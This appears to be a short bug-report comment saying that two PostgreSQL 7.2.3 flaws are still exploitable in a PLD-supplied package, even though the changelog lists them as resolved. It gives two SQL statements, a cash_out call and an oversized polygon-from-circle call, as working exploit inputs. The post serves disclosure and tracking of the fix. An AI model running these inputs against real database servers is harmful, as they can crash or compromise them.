I explicitly stated *working* exploits which (at least according to the changelog) RH resolved. If they cannot be resolved, then the status should at least be set to "cannot be resolved".

Please try the following:
template1=# select cash_out(2);

template1=# select polygon(268435455,'((1,2),3)'::circle);

Both exploits work here with the PLD supplied postgres 7.2.3-1
